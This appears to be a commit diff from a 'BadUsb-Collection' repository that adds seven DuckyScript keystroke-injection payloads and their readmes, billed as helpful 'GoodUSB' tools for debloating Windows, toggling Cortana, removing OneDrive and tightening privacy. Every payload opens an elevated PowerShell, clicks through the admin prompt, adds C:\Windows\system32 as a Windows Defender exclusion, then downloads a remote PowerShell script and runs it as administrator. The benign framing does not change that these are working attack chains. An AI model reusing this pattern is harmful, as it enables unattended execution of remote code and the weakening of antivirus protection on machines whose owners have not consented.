🤬
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/GoodUSB/Bloatware_removal/bloatware_remover.txt
     1 +REM Author: UNC0V3R3D
     2 +REM Description: Remove bloatware from your windows computer.
     3 +REM Version: 1.0
     4 +REM Category: GoodUSB
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 500
     8 +STRING powershell Start-Process powershell -Verb runAs
     9 +CTRL-SHIFT ENTER
     10 +DELAY 1500
     11 +SHIFT TAB
     12 +DELAY 500
     13 +ENTER
     14 +DELAY 1500
     15 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32
     16 +ENTER
     17 +DELAY 500
     18 +STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/remove_bloatware_regkeys.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/GoodUSB/Bloatware_removal/readme.md
     1 +
     2 +# Bloatware_remover
     3 +Removes useless software from your pc.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open powershell
     13 +- download ps1 script
     14 +- remove bloatware
     15 +
     16 +
     17 +## Feedback
     18 +
     19 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +
     26 +## Support
     27 +
     28 +For support, contact me via Discord "UNC0V3R3D#8662".
     29 +
     30 +
     31 +## Meta
     32 +
     33 +
     34 +- If you want to sponsor me on Patreon, the link is on my profile.
     35 +
     36 +
     37 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/GoodUSB/Clear_Explorer/clear_explorer.txt
     1 +REM Author: UNC0V3R3D
     2 +REM Description: Clear last used items in the explorer app.
     3 +REM Version: 1.0
     4 +REM Category: GoodUSB
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 500
     8 +STRING powershell Start-Process powershell -Verb runAs
     9 +CTRL-SHIFT ENTER
     10 +DELAY 1500
     11 +SHIFT TAB
     12 +DELAY 500
     13 +ENTER
     14 +DELAY 1500
     15 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32
     16 +ENTER
     17 +DELAY 500
     18 +STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/clear_last_used_items.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/GoodUSB/Clear_Explorer/readme.md
     1 +
     2 +# clear_explorer
     3 +Clears the list of the last used items, that you can see in the explorer app.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open powershell
     13 +- download ps1 script
     14 +- clear list
     15 +
     16 +
     17 +## Feedback
     18 +
     19 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +
     26 +## Support
     27 +
     28 +For support, contact me via Discord "UNC0V3R3D#8662".
     29 +
     30 +
     31 +## Meta
     32 +
     33 +
     34 +- If you want to sponsor me on Patreon, the link is on my profile.
     35 +
     36 +
     37 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/GoodUSB/Disable_Cortana/disable_cortana.txt
     1 +REM Author: UNC0V3R3D
     2 +REM Description: Disable the really annoying Cortana assistant.
     3 +REM Version: 1.0
     4 +REM Category: GoodUSB
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 500
     8 +STRING powershell Start-Process powershell -Verb runAs
     9 +CTRL-SHIFT ENTER
     10 +DELAY 1500
     11 +SHIFT TAB
     12 +DELAY 500
     13 +ENTER
     14 +DELAY 1500
     15 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32
     16 +ENTER
     17 +DELAY 500
     18 +STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/disable_cortana.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/GoodUSB/Disable_Cortana/readme.md
     1 +
     2 +# disable_cortana
     3 +As the title says, this script will remove the Cortana assistant from windows.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open powershell
     13 +- download ps1 script
     14 +- remove cortana
     15 +
     16 +
     17 +## Feedback
     18 +
     19 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +
     26 +## Support
     27 +
     28 +For support, contact me via Discord "UNC0V3R3D#8662".
     29 +
     30 +
     31 +## Meta
     32 +
     33 +
     34 +- If you want to sponsor me on Patreon, the link is on my profile.
     35 +
     36 +
     37 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/GoodUSB/Enable_Cortana/enable_cortana.txt
     1 +REM Author: UNC0V3R3D
     2 +REM Description: Enables the really annoying Cortana assistant.
     3 +REM Version: 1.0
     4 +REM Category: GoodUSB
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 500
     8 +STRING powershell Start-Process powershell -Verb runAs
     9 +CTRL-SHIFT ENTER
     10 +DELAY 1500
     11 +SHIFT TAB
     12 +DELAY 500
     13 +ENTER
     14 +DELAY 1500
     15 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32
     16 +ENTER
     17 +DELAY 500
     18 +STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/enable_cortana.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/GoodUSB/Enable_Cortana/readme.md
     1 +
     2 +# enable_cortana
     3 +As the title says, this script will enable the Cortana assistant from windows.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open powershell
     13 +- download ps1 script
     14 +- enable cortana
     15 +
     16 +
     17 +## Feedback
     18 +
     19 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +
     26 +## Support
     27 +
     28 +For support, contact me via Discord "UNC0V3R3D#8662".
     29 +
     30 +
     31 +## Meta
     32 +
     33 +
     34 +- If you want to sponsor me on Patreon, the link is on my profile.
     35 +
     36 +
     37 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/GoodUSB/OneDrive_Removal/readme.md
     1 +
     2 +# uninstall_onedrive
     3 +This script will download a script that will remove the onedrive app from windows.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open powershell
     13 +- download ps1 script
     14 +- remove onedrive
     15 +
     16 +
     17 +## Feedback
     18 +
     19 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +
     26 +## Support
     27 +
     28 +For support, contact me via Discord "UNC0V3R3D#8662".
     29 +
     30 +
     31 +## Meta
     32 +
     33 +
     34 +- If you want to sponsor me on Patreon, the link is on my profile.
     35 +
     36 +
     37 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/GoodUSB/OneDrive_Removal/uninstall_onedrive.txt
     1 +REM Author: UNC0V3R3D
     2 +REM Description: Uninstalls OneDrive.
     3 +REM Version: 1.0
     4 +REM Category: GoodUSB
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 500
     8 +STRING powershell Start-Process powershell -Verb runAs
     9 +CTRL-SHIFT ENTER
     10 +DELAY 1500
     11 +SHIFT TAB
     12 +DELAY 500
     13 +ENTER
     14 +DELAY 1500
     15 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32
     16 +ENTER
     17 +DELAY 500
     18 +STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/uninstall_onedrive.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/GoodUSB/Privacy_Windows/privacy.txt
     1 +REM Author: UNC0V3R3D
     2 +REM Description: Want to feel the privacy on Windows?
     3 +REM Version: 1.0
     4 +REM Category: GoodUSB
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 500
     8 +STRING powershell Start-Process powershell -Verb runAs
     9 +CTRL-SHIFT ENTER
     10 +DELAY 1500
     11 +SHIFT TAB
     12 +DELAY 500
     13 +ENTER
     14 +DELAY 1500
     15 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32
     16 +ENTER
     17 +DELAY 500
     18 +STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/privacy.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/GoodUSB/Privacy_Windows/readme.md
     1 +
     2 +# privacy
     3 +This script will download and execute a large script that removes features that likely do not provide much privacy.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open powershell
     13 +- download ps1 script
     14 +- provide privacy
     15 +
     16 +
     17 +## Feedback
     18 +
     19 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +
     26 +## Support
     27 +
     28 +For support, contact me via Discord "UNC0V3R3D#8662".
     29 +
     30 +
     31 +## Meta
     32 +
     33 +
     34 +- If you want to sponsor me on Patreon, the link is on my profile.
     35 +
     36 +
     37 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/GoodUSB/Win_Debloater/readme.md
     1 +
     2 +# win_debloat
     3 +This script will uninstall unnecessary and potentially useless apps.
     4 +
     5 +## How to use?
     6 +
     7 +This script is plug and play.
     8 +
     9 +
     10 +## Features
     11 +
     12 +- open powershell
     13 +- download ps1 script
     14 +- delete useless apps
     15 +
     16 +
     17 +## Feedback
     18 +
     19 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +
     26 +## Support
     27 +
     28 +For support, contact me via Discord "UNC0V3R3D#8662".
     29 +
     30 +
     31 +## Meta
     32 +
     33 +
     34 +- If you want to sponsor me on Patreon, the link is on my profile.
     35 +
     36 +
     37 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/GoodUSB/Win_Debloater/win_debloat.txt
     1 +REM Author: UNC0V3R3D
     2 +REM Description: Debloat windows.
     3 +REM Version: 1.0
     4 +REM Category: GoodUSB
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 500
     8 +STRING powershell Start-Process powershell -Verb runAs
     9 +CTRL-SHIFT ENTER
     10 +DELAY 1500
     11 +SHIFT TAB
     12 +DELAY 500
     13 +ENTER
     14 +DELAY 1500
     15 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32
     16 +ENTER
     17 +DELAY 500
     18 +STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/debloat_windows.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
     19 +ENTER
Please wait...
Page is in error, reload to recover